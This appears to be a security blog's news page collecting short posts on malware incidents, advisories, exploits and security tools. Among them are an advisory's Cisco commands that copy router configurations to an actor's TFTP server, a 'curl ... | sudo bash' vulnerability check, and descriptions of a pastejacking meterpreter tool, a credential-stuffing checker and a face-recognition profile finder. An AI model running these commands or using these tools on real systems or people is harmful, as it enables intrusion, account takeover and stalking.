@0xffff0800 was so kind to provide the community with a comprehensive collection of malware samples for analysis and sandboxing fun. I personally use many of them as a test for my Cuckoo.

If you'd like taking things apart, choose any of the samples and try your best. But be aware of the danger that "playing with fire" has.  :-)

Heise News is reporting that Kraus Maffei has been blackmailed by attackers using EMOTET. From my personal background I know, that some employees are still sitting at home waiting for theit IT euipment to be rebuild so they can start working again.

Sometimes the cost of a good cyber defence has to be meisured by the cost of not having them had in the forehand.

Translation of the original articel from heise by Oliver Bünte:

The engineering group Krauss Maffei has been struck by a serious cyber attack. After the attack a good two weeks ago, the company headquartered in Munich produced at some locations only with reduced performance, as many computers were paralyzed due to a Trojan attack, confirmed a company spokesman on Thursday evening. In the meantime, his company is on the "way to the normal state", production is being ramped up. Important files would be made to work. The vast majority of sites were not affected.

In addition, the previously unknown attackers should have demanded ransom from the group. The speaker did not want to say anything about the amount of the claim. Several security authorities were informed immediately after the attack on the night of November 21, according to the Frankfurter Allgemeine Zeitung (FAZ).

Trojan causal
According to the FAZ, the main location affected by the attack was the Munich location, where around 1,800 employees work for KraussMaffei and produce machinery for industry. An unspecified Trojan would have infested the network, encrypted computer files and thus rendered useless. Whether this is a variant of the Trojan Emotet, is still unclear. As a result of the attack control systems in production and assembly could not have been started. The systems were running again, however. The company did not provide information on the amount of damage.

On request of the FAZ, the Federal Office for Information Security (BSI) referred to two other topical cases without mentioning the names of those affected. One of the two companies is likely to be the clinic in Fürstenfeldbruck, Bavaria, for which a variant of the currently rampant Trojan Emotet is believed to be the cause. According to a BSI spokesman, one hundred percent of the network's servers and computers failed during the attacks. In addition, several companies had shut down their production facilities themselves, resulting in production losses. It is unclear whether they are the same perpetrators in all cases.

The KraussMaffei Group with more than 5,000 employees claims to be one of the world's leading manufacturers of machinery and equipment for the production and processing of plastics and rubber. In 2016, the group was acquired by the Chinese chemicals group China National Chemical Corporation (ChemChina). The Chinese Securities and Exchange Commission has recently granted approval for a planned IPO, according to the company. The engineering company is not to be confused with the armaments company and tank builder Krauss-Maffei Wegmann (KMW). (with dpa material)

mubix@hak5.org did an excellent summary with a cool collection of short commands that keeps you from searching.

I found a lot of cool stuf that can beused in other areas of the cyber work as well.

Check the source at: Google or see my page done witzh it's data.

One of these "you'd have never thought of this":

To promote a YoutUbe channel, a guy used a common printer exploit kit to print his promotion.

Door Pieter Ceelen, Technical security analyst at Outflank is sharing his thoughts and techniques of using sysmon to detect the execution of macros for your SIEM.

Enhance your sysmon config with:

And get:

Started some writing about what to do as 1st responder in a incident response case.

Stay tuned and join me on my article.

One of my latest articles released at VDI:

Continue here

Shusei Tomonaga is giving good results on most commonly used windows internal commands. From looking at the specific hitrates, this would be a perfect entrypoint for creating some usecases to detect bad guys on the machine.

Read the complete article here.

Reconnaissance

Spread of Infection

A less technical but rather process view of handling a malware incidence response.
This will become a "must read" for every incident responder.

Known command-lines of fileless malicious executions.

https://github.com/chenerlich/FCL/tree/master/Malwares

Motivation

While hashing malicious files to identify malicious executions is easy, blocking the execution of fileless malware is more challenging. This repository's purpose is to collect command lines being used by threat actors, to ease the difficult of identifying them.

Structure

Each FCL file contains\may contain the following data:

• Malware name
• Executing process(es)
• Malicious command-lines (contain dysfunctional URLs)
• Fully\Partially deobfuscated command-lines
• Regular Expression for detection
• Technical write-ups
• Sandbox report links
• Notes

Follow the USCYBERCOM Malware Alert on Twitter to be informed of published uncassified APT malware samples at VirusTotal.

@CNMF_VirusAlert

This account is an alerting mechanism to highlight when #CNMF posts malware samples to Virus Total, enhancing our shared global cybersecurity.

FORT GEORGE G. MEADE, Md. — Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity. For members of the security community, CNMF-discovered malware samples will be logged at this website: 

I must admit, that I'm still surprised what "cool" ideas are out there to trick some malicous action to users. - Well, check this out, how while cut'n paste could do you some harm.

PasteJacker

The main purpose of the tool is automating (PasteJacking/Clipboard poisoning/whatever you name it) attack with collecting all the known tricks used in this attack in one place and one automated job as after searching I found there's no tool doing this job the right way 

Now because this attack depends on what the user will paste, I implemented the Metasploit web-delivery module's idea into the tool so when the user pastes into the terminal, you gets meterpreter session on his device 

What's PasteJacking ?

In short, Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and change its content to something harmful without your knowledge. From The Windows club definition

So here what I did is automating the original attack and adding two other tricks to fool the user, using HTML and CSS Will talk about it then added meterpreter sessions as I said before.

References

• D4Vinci GitHub Repro
• PasteJacking GitHub repo
• Clipboard poisoning attacks on the Mac - Malwarebytes
• Metasploit web-delivery module's source and idea

Cloud Shell

Google Cloud Shell provides you with command-line access to your cloud resources directly from your browser without any associated cost. This is a very neat feature which means that whoever is browsing google’s cloud platform website (https://console.cloud.google.com) can immediately jump into performing commands using the gcloud command.

In short, you can install backdoors and due to the lack of monitoing capabilities, no one will ever know ...

Zero-Day Microsoft Edge Vulnerability Induces RCE Attacks

As disclosed, an exploit developer Yushi Liang has claimed to have found a vulnerability that breaks Microsoft Edge browsers. The newly discovered zero-day Microsoft Edge vulnerability could allow an attacker to remotely execute arbitrary codes on the target system. Liang first revealed his discovery in a tweet.

No Patches Available Yet

For now, users of Microsoft Edge may not find a fix for the bug since the researcher has not reported the flaw to Microsoft. Probably, as more details come up, Microsoft may release a patch for it. However, until then, the only mitigation seems to be the choice of user accounts. While using Microsoft Edge, users may avoid logging in to accounts with administrator privileges for minimal damages.

X.Org security advisory: October 25, 2018

Privilege escalation and file overwrite in X.Org X server 1.19 and later
========================================================================
Incorrect command-line parameter validation in the Xorg X server can
lead to privilege elevation and/or arbitrary files overwrite, when the
X server is running with elevated privileges (ie when Xorg is
installed with the setuid bit set and started by a non-root user).

The -modulepath argument can be used to specify an insecure path to
modules that are going to be loaded in the X server, allowing to
execute unprivileged code in the privileged process.

The -logfile argument can be used to overwrite arbitrary files in the
file system, due to incorrect checks in the parsing of the option.

This issue has been assigned CVE-2018-14665

Background
==========

The commit
https://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7 which
first appeared in xorg-server 1.19.0 introduced a regression in the
security checks performed for potentially dangerous options, enabling
the vulnerabilities listed above.

Overwriting /etc/shadow with -logfile can also lead to privilege
elevation since it's possible to control some part of the written log
file, for example using the -fp option to set the font search path
(which is logged) and thus inject a line that will be considered as
valid by some systems.

Patches
=======

A patch for the issue was added to the xserver repository on
October 25, 2018.

https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330e

Workaround
==========

If a patched version of the X server is not available, X.Org
recommends to remove the setuid bit (ie chmod 755) of the installed
Xorg binary.  Note that this can cause issues if people are starting
the X window system using the 'startx', 'xinit' commands or variations
thereof.

X.Org recommends the use of a display manager to start X sessions,
which does not require Xorg to be installed setuid.

Thanks
======

X.Org thanks Narendra Shinde who discovered and reported the issue,
and the Red Hat Product Security Team who helped understand all
impacts.

-- 
Matthieu Herrb

Check my new pages here that I did for my CISSP preparation.

Not an easy to exploit one, but very interesing though.

Read more from MorteNoir1 here

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that a network card is Intel PRO/1000 MT Desktop (82540EM) and a mode is NAT).

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets are of data link layer frames and of other, more high level headers. Packets supplied to the adaptor are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores such metainformation as packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.

The 82540EM datasheet provides for three Tx descriptor types: legacy, context, data. Legacy is deprecated I believe. The other two are used together. The only thing we care of is that context descriptors set the maximum packet size and switch TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. The data descriptor's packet size must be lesser than the context descriptor's maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

Surprise, surprise, the insecure IoT-Landscape is threatening all of us and gives the security analyst a hard time but the crooks a good time.

If you got 35 minutes left, read this article about the IoT attacks that F5 brought us here.

I'm personally not sure if this will make defender a real good AV solution, but it's using state of the art technology now. We shall check the AV comparsions during the next months to see the detection rates compared to other vendor solutions.

In Microsoft 365, Windows, Windows Defender Advanced Threat Protection, Endpoint Security, Threat Protection, Product Updates, Research

Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox. With this new development, Windows Defender Antivirus becomes the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.

Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community. It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.

While it was a tall order, we knew it was the right investment and the next step in our innovation journey. It is available to Windows Insiders today. We encourage researchers and partners to try and examine this feature and give us feedback, so we can fine-tune performance, functionality, and security before we make it broadly available.

Find the (german) official cybercrime report done by the german authorities at the BKA-page here.

This might become the #1 JaliBreak for iOS 11.4 I supose.

io_hideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it putsa mach message which it sends whenever it wants to notify a client that there's data availablein the queue. 
As a client we can modify this mach message such that the server (hidd on MacOS, backboardd on iOS)will send us an arbitrary mach port from its namespace with an arbitrary disposition. 
This is a minimal PoC to demonstrate the issue. Interpose it in to the PoC for P0 1623, Apple issue 695930632 
Attaching two PoCS:
deja-xnu: exploit for this issue on iOS 11.4.1 to get code execution as backboardd, and then trigger p0  issue 1658
dq8: exploit for this issue, and a new exploit for the original pangu variant of this issue to get a real tfp0 on iOS 7.1.2  
Proof of Concept:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45650.zip

Sophos Naked Security is giving us a cool news about Forefox and Chrome to block certificates signed by Symantec.

Most people who use Google’s popular browser will receive the update, and either won’t realise or won’t especially care about the changes it contains.

Next Tuesday, Firefox 63 will be released, and much the same thing will happen for users of Mozilla’s browser.

But one of the changes common to both those products, which have a huge majority of the market share amongst laptop users, may matter very much to a small but significant minority of website operators.

Chrome 70 and Firefox 63 will both be disowning any web certificates signed by Symantec.
From this month, anyone with Chrome or Firefox who browses to a web page “secured” with a Symantec certificate will see an unequivocal warning insisting that the site is insecure:

continue Paul Ducklins article here.

@Bank_Security is writing about a reverse shell done in C++/C# that is hard/impossible to be detected by AV.

Introduction

On December 2017 i wrote an article about some possible Insider Attacks that using in-memory PowerShell scripts which, months ago, were not detected by the major AV solutions. During last months, after warning all the vendors, they started to detect these attacks. Among the various attacks used in my article there was the opening of a reverse shell through the powersploit script executed directly in memory that is currently detected by most of AV vendors but…

..what would happen if that same behavior was done by a C++/C# program or something else?

Continue the complete article here.

Googles ProjectZero team found a major security issue in WhatsApp.
To solve this issue and not loose your phone by simply receiving a WhatApp video call, just update to the latest version.

Bloomberg is writing about a very scary situtaion (here).

Although I personally remember a situation of the US planting a special IOS into Cisco equipment as well, it's scarry that even the Chinese have been cought in doing things like that. So rather doublecheck your Supermicro mainboard....

During the ensuing top-secret probe, which remains open more than three years later, investigators determined that the chips allowed the attackers to create a stealth doorway into any network that included the altered machines. Multiple people familiar with the matter say investigators found that the chips had been inserted at factories run by manufacturing subcontractors in China.

FireEye gives us some background on APT38

See my work in progress while I prepare myself for the upcoming Lunch&Learn of OSINT

Please be aware, that the PGP addon for Thunderbird and Outlook does not encrypt mails while telling you it does (If used in the default "Junior" settings)

The way to mitigate this, is to change the default setting to force (either S7MIME or pep) as:

Security Vulnerability (Keep the fingers off the JET Database Engine)

Published: 09/11/2018 
MITRE CVE-2018-8392

A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To exploit the vulnerability, a user must open a specially crafted Excel file while using an affected version of Microsoft Windows. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Excel file to the user, and then convincing the user to open the file.

The security update addresses the vulnerability by modifying how the Microsoft JET Database Engine handles objects in memory.

Avira is giving us news about a new "evil at the sky" that has been discovered by Palo Alto Networks, infecting Windows and Linux servers.

It is specialized in taking over Hadoop, Redis, and Active MQ servers and tries to brute-force into services like web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

I found some very cool URL's that describe and link the tools we should all be aware of to ease our daily work.

Check out my extra page here.

... well I didn't until I found https://isc.sans.edu/diary/24056

Have fun.  :-)

Erik found a cool article from DarkReading that tells us about a new way of Turlas C6C communication via mailed PDF's.
Remember how APT28 broke into the Germen Foreign Ministry, well this is just another way of obfuscating C6C via mail.

"The backdoor is designed to monitor all incoming and outgoing emails from the compromised system and to collect message metadata about the sender, recipient, subject, and attachment name (if any). The data is compiled in logs that are then bundled together and sent periodically to Turla operators in specially crafted PDF documents attached to emails.

The Outlook backdoor also checks all incoming email for PDFs that might contain commands from the attackers. The malware is designed to accept commands from any threat actor that is able to encode them in the right format in a PDF document. If the email address to which the malware typically transmits stolen data is blocked, the threat actor can regain control of the backdoor simply by sending a rogue PDF with a new C2 address.

The main difference from other backdoors is that the operator can initiate the communication with the backdoor while the malware is inspecting emails being downloaded automatically to the inbox,

The Carnegie Mellon University reports:

Vulnerability Note VU#906424

CVSS Metrics

References

• https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
• https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f

As per Kevin Beumont:

High level overview

• Needs prior code execution to exploit.
• Exploit currently only works on 64-bit OSes (likely Win 10 and Server 2016).

What is it the flaw?

“_SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL. It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here. Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. This will result in an arbitrary DACL write. This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.” — source

Ways to detect

• If you use Microsoft Sysmon, look for spoolsv.exe spawning abnormal processes — it’s a sure sign this exploit is being used (or another Spooler exploit). Similarly if you use Sysmon, look for conhost.exe (Task Scheduler) spawning under abnormal processes (e.g. the Print Spooler).

Ways to mitigate

• Antivirus, segmentation, don’t allow untrusted users to run code.

Ways to fix

• Microsoft need to fix the function. This will probably happen in a few weeks.

Cofense reports another bank targeted campain was rolling from 7:30 EST on Aug 15 until 15:37 EST. So plerase check your LMS for "Request BOI” or “Payment Advice <random alpha numeric>” findings that could be related to that campain.

As per Cofense:
Necurs is a rootkit first observed in 2012. It utilizes multiple Domain Generation Algorithms (DGA’s) coupled with .bit domain names as well as P2P communications to remain resilient against shutdown. Necurs became fairly famous when it began sending waves of Dridex and Locky a few years ago.  We have noticed an uptick in campaigns originating from the Necurs botnet in recent weeks.

What stood out today is what changed. Necurs for months has been sending a seemingly never-ending stream of typical spam campaigns. Today at 7:30am EST we noticed a new file extension attached to its phishing campaigns: .PUB, which belongs to Microsoft Publisher.  Like Word and Excel, Publisher has the ability to embed macros. So just when you are feeling confident about a layered defense protecting you from Malicious Word docs, Necurs adapts and throws you a curveball.

The other eyebrow-raising moment is when it was observed that all of the recipients worked for banks. There were no free mail providers in this campaign, signaling clear intent by the attackers to infiltrate banks specifically.

The emails are fairly basic and appear to be coming from someone in India with the subject of “Request BOI” or “Payment Advice <random alpha numeric>”.

The Swiss "Sontaszeitung" (sunday newspaper) is reporting, that around 15000 Swiss email accounts "belonged to employees of various state administration bodies, companies close to the state, universities, and other official organizations." (as SwissInfo reports), are used to blackmail owners.

The problem besides the reputational and informational issues such an attack has, is more the fact that these information can/will be used in phishing and other attempts to infiltrate further entities. Especially state-related companies as the (in)famous RUAG might be in danger (again). As already happened at RUAG in 2016.

So please, don't use your office mail to do private stuff and
be vigilant when opening mail (even from known senders).

Another ICS/SCADA topic, the DARKReading is writing about.

Interfax-Ukraine reported that the LLC Aulska station in Auly was hit with a VPNFilter infection intended to disrupt operations at the chlorine station.  

"Specialists of the cyber security service established minutes after [the incident] that the enterprise's process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident," the SBU wrote on its Facebook page, according to the report.

[....]

ICS/SCADA expert Robert Lee says the initial reports out of Ukraine don't provide sufficient details to confirm the attack could have caused a physical attack. "What we know right now about VPNFilter indicates that there was nothing in the malware to support the scenario of physical damage and operational impact that was described," says Lee, CEO and founder of Dragos.

He says there are other possible scenarios for a physical attack, such as the attackers "directly using that access," but the SBU's report doesn't specifically indicate that.

"In this case we need more details," he says. "Obviously the SBU is doing good work, but the rest of the community would benefit from more insight, as the scenario presented leaves many questions."

Did you see this email in your inbox?

DO NOT OPEN, it's trying to foul you.  :-)

For an order I got to scan all external IP addresses of a certain company and its subsidaries, I had some thoughts about doind a grepable database search.

Unfortunately, whois is limitited in his capabilities, so the idea is to mirror the whois into a MySQL and do the search for certain string on your local machine without any limitations.

Check my article about details (work in progress) here.

WIRED is giving us an article, that the US court has permitted the publishing 3D-files of guns via the internet. Including an AR-15 printout file ready to go for your 3D-printer. 

I personally think that this does not need any further comments.

Check out:

By the way, as we had a discussion yesterday about some legal stuff, publishing such files would not be legal in Germany.

Erik found a cool tool to search public leak-databases for any given mailaddress.

Check out Cr3dOv3r from D4Vinci

• Search for public leaks for the email and if there's any, it returns with all available details about the leak (Using hacked-emails site API and now haveibeenpwned API too).
• Now you give it this email's old or leaked password then it checks this credentials against 13 websites of well-known websites (ex: facebook, twitter, google...) then it tells you if login successful in any website!

Did you ever wanted your own Maneger-Thrilling-Threat-Map that kicks your managers out of their chairs?

Well here you go, enhance your Splunk with this app and build your own Threat-Map from your own data.

Missile Map

This visualisation will show connected arcs on a map. Each arc is defined by two geographic points, and can have a color assigned. Additionally the arcs can be animated, with the pulsing animation being either at the start or the end of the arc.

Globally, the arc thickness, default color and map tileset can be chosen, as well as the starting map position and zoom.

This visualisation is based upon leaflet.migrationLayer by react-map: https://github.com/react-map/leaflet.migrationLayer

Some use cases could be:

• Show data replication links between sites and their status
• Show a representation of incoming attacks or requests

Note: If any lines are animated this will result in heightened browser CPU usage.

Search and data formatting

The visualisation looks for fields of the following names:

• start_lat: The starting point latitude (required)
• start_lon: The starting point longitude (required)
• end_lat: The ending point latitude (required)
• end_lon: The ending point latitude (required)
• color: The color of the arc in hex format (optional, default "#FF0000")
• animate: Whether to animate this arc (optional, default "false")
• pulse_at_start: When animated, set to true to cause the pulse to be at the start of the arc instead of the end (optional, default "false")
• weight: The line weight of the arc (optional, default 1).

The fields must be named in this way, but they are not order dependent.

An example dataset is distributed as a lookup to experiment with.

| inputlookup missilemap_testdata

This only works if their Facebook Profile is public

What does this do?

In simple words you have at least one Image of the Person you are looking for and a clue about its name. You feed this program with it and it tries to find Instagram, Youtube, Facebook, Twitter Profiles of this Person.

How does it work?

You give it a name and at least one photo. It then searches Facebook for this name and does Facial Recognition to determine the right Facebook Profile. After that it does a Google and ImageRaider Reverse Image Search to find other Social Media Profiles.

If a Instagram Profile was found it will be verified by comparing your known photo of the Person to some of the Instagram Pictures.

In the end you get a PDF Report :)

Another great source for "stalking" is here: https://inteltechniques.com/menu.html

Discovered by Jake Archibald check the link for background..

To have an alternative to RedLine, binalyze has made hist tool free to use. - So have a look.

IREC is an all-in-one Evidence Collector which lets you collect critical evidence from a live system with a single mouse click.Advantages

• Complete. Collects RAM Image, $MFT as CSV, Event Logs, Hibernation Info, DNS Cache and much more,
• Portable. No installation required,
• Compatible. Supports all 32 and 64 bit Windows versions starting from XP,
• User Friendly. Creates easy to share HTML and JSON reports,
• Lightning Fast. It collects them all in a few minutes!

I gave it a try and for a "quick win" it's quite nice. :-)

TUESDAY, 19 JUNE 2018
Launching VirusTotal Monitor, a service to mitigate false positives

One of VirusTotal’s core missions is to empower our antivirus partners. By building better tools to detect and study malware, VirusTotal gets to make a dent in the security of billions of users (all those that use the products of our partners). Until now we have focused on helping the antivirus industry flag malicious files, and now we also want to help it fix mistaken detections of legit files, i.e. false positives. At the same time, we want to fix an endemic problem for software developers.
False positives impact antivirus vendors, software developers and end-users. For example, let us imagine a popular streaming service app that allows in-app digital content purchases. We will call it Filmorrific.

Continue here.

Now we will go through to the payload and the SWF file. :)
The Exploitable SWF File:
for me, one of the trickiest file to analyze is the SWF, because debugger for this file type are not so often seen in public, So usually the way to analyze this as far as I know is through black-box, code decompiler and static analysis of the code.
The SWF file downloaded by this EK are compressed SWF, but nicely the jpex decompiler manage to decompile it.
some noteworthy code in the SWF show that this was related to CVE- 2015-8651.

Continue reading here.

Sabri wrote a cool article here.

Today I’m going to reveal how Apple ended up with all the metadata of the emails you ever sent (and even received in some cases) using the official Mail app since the launch of iCloud.

Many years ago I stopped using Gmail but I kept the account. Instead of deleting it I deleted everything inside including emails and contacts and kept it connected to my phone using the official Mail app. 2 years ago, I noticed that when writing an email and started to type the recipient I could see my deleted contacts showing up. I checked Google again and even iCloud Contacts but nothing.

Ever since I never had time to properly investigate what actually happened but with this GDPR day, I remembered of this and I was more than willing to take a closer look.

.... (continue reading)

Beware of mice, get yourself a cat.  .-)

/dev/random is writing a fantastic article of how to invest 30€ into a WiFi-HID-Injector.

1. Connect the evil USB device to the victim’s computer or ask him/her to do it (with some social engineering tricks)
2. Once inserted, the USB device adds a new serial port and fires up the wireless network
3. The attacker, located close enough to get the wireless signal, takes control of the device, loads his payload
4. The HID (keyboard) injects the payload by simulating keystrokes (like a Teensy) and executes it
5. The payload sends data to the newly created serial port. Data will be saved to a flat file on the USB device storage
6. The attack can download those files

EFAIL, it's not PGP that has been compromised but the way is was implemented into modern mail clients...

But read more at https://efail.de/

A little demo in Splunk to visualise the APT attacks performed by the APT Simulator.

Makes it possible to demonstrate the live APT aktions of the simulator within a Splunk daskboard. Might be very usefull for demos an impressing managers. :-)

Read the my article at the subpage here.

Splunk APT demonstration

Splunk chart showing the attacks performed by the APT-simulator.

Nextron Systems GmbH gave us a cool bunch of tools to simulate APT attacks on a Windows machine.

The "infection" stays completle harmless and everything is done by downloading and running a simple BAT-file without any fancy stuff to be installed.
Just have a look at the list of testcases below for a quick check of the abilities.

Right now, I've installed the sysmon at the same system and use a splunk forwarder to monitor the victim for evidences of APT's. Also the usecase checks are about to be completly done at the Spunk side to give the team a comprehensive monitoring and training scenario. Although the Splunk sysmon app is detecting a view things already and proves me that this way of doing will/can work.

Stay tuned for further news about this project... :-)

The below table shows the different test cases and the expected detection results.

• AV = Antivirus
• NIDS = Network Intrusion Detection System
• EDR = Endpoint Detection and Response
• SM = Security Monitoring
• CA = Compromise Assessment

Although MyEtherwallet is talking about DNS-sppofing it was more likely a BGP-Rerouting hack at Amazon that happened 24th.Apr.18.

The attackers used BGP — a key protocol used for routing internet traffic around the world — to reroute traffic to Amazon’s Route 53 service, the largest commercial cloud provider who count major websites such as Twitter.com as customers.

They re-routed DNS traffic using a man in the middle attack using a server at Equinix in Chicago.

From there, they served traffic for over two hours.

This would allow them to intercept traffic globally across the internet to Amazon Route 53 customers.

Surprise, surprise, if you open ports on your routers towards the Internet, YOU ARE VULNARABLE ! ! !

DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices—coupled with a Russian government campaign to exploit these devices—threatens the safety, security, and economic well-being of the United States.

The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.

Continue reading the advisory here.

Stage 1: Reconnaissance

Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning include

• Telnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),
• Hypertext Transport Protocol (HTTP, port 80),
• Simple Network Management Protocol (SNMP, ports 161/162), and
• Cisco Smart Install (SMI port 4786).

Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.

Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.

Whatch out for below attributes being access from the Internet:

• SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “80.255.3.85”
• SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs) Command ID  1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “87.120.41.3” and community strings of ”public” ”private” or ”anonymous”

• SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85
• SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter “87.120.41.3”, using community strings “private” and “anonymous”
• The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.
• Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.
• Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of “public”. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.
• SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs
  • 210.245.123.180

Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:

• copy nvram:startup-config flash:/config.text
• copy nvram:startup-config tftp://[actor address]/[actor filename].conf

In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.

• copy system:running-config flash:/config.text
• copy flash:/config.text tftp://[ actor address]/[actor filename].conf

https://twitter.com/0dayMarketing is writing abound a cool sounding vuln discovered.

Am I vulnerable?

Most likely! If you have beep installed as setuid and it was compiled with a certain compiler version and options and your machine is compromised, your network is at risk.

Please run this command to find out: curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
If your computer is vulnerable it will beep.

Is this vulnerability serious?

Holey Beep is just a simple privilege escalation bug. However, it can be used in an exploit chain to trigger more serious issues.

Were there any signs of exploitation in the wild?

We found this YouTube video that outlines the exploitation steps.

Posted By Homer Pacag

Malware authors often distribute malware through code macros in Microsoft Office documents such as Word, Excel, or PowerPoint. Regardless of the particular Office version, macros can be executed whenever the user opens the file. By default users get warnings from Office that the file they are about to open will run a macro, but at that point it's up to the user to decide whether to take the risk.

Recently, we have been receiving a lot of standard macro-related downloaders, most of them distributed from the Necurs botnet. However, the sample we look at today takes a longer, macro-less approach.

We have been monitoring an email spam campaign where opening the attachment downloads a password stealer as its final payload. However, getting to that payload uses a four-stage infection process, as summarized below.

Continue reading at:

As the UK voted to "brexit", it even has effects on the internet.

As of the withdrawal date, undertakings and organisations that are established in the United Kingdom but not in the EU, and natural persons who reside in the United Kingdom will no longer be eligible to register .eu domain names or, if they are .eu registrants, to renew .eu domain names registered before the withdrawal date.

Read the complete article here.

"It was only last November that the UIDAI asserted that “Aadhaar data is fully safe and secure and there has been no data leak or breach at UIDAI.” Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far."

A quick chat, and full access

• 12:30 pm: This correspondent posing as ‘Anamika’ contacted a person on WhatsApp number 7610063464, who introduced himself as ‘Anil Kumar’. He was asked to create an access portal.
• 12:32pm: Kumar asked for a name, email ID and mobile number, and also asked for Rs 500 to be credited in his Paytm No. 7610063464.
• 12:35 pm: This correspondent created an email ID, aadharjalandhar@gmail.com, and sent mobile number ******5852 to the anonymous agent.
• 12:48 pm: Rs 500 transferred through Paytm.
• 12:49 pm: This correspondent received an email saying, “You have been enrolled as Enrolment Agency Administrator for ‘CSC SPV’. Your Enrolment Agency Administrator ID is ‘Anamika_6677’.” Also, it was said that a password would be sent in a separate mail, which followed shortly.
• 12:50 pm: This correspondent had access to the Aadhaar details of every Indian citizen registered with the UIDAI.

The spanish news "The Local" has a nice article about justice coming true in real world. :-)

Photo: billiondigital/Depositphotos

Spain and Europol on Monday announced the arrest of a Ukrainian man dubbed the mastermind of a gang behind hundreds of cyberattacks that have netted around a billion euros from banks.

Continue here...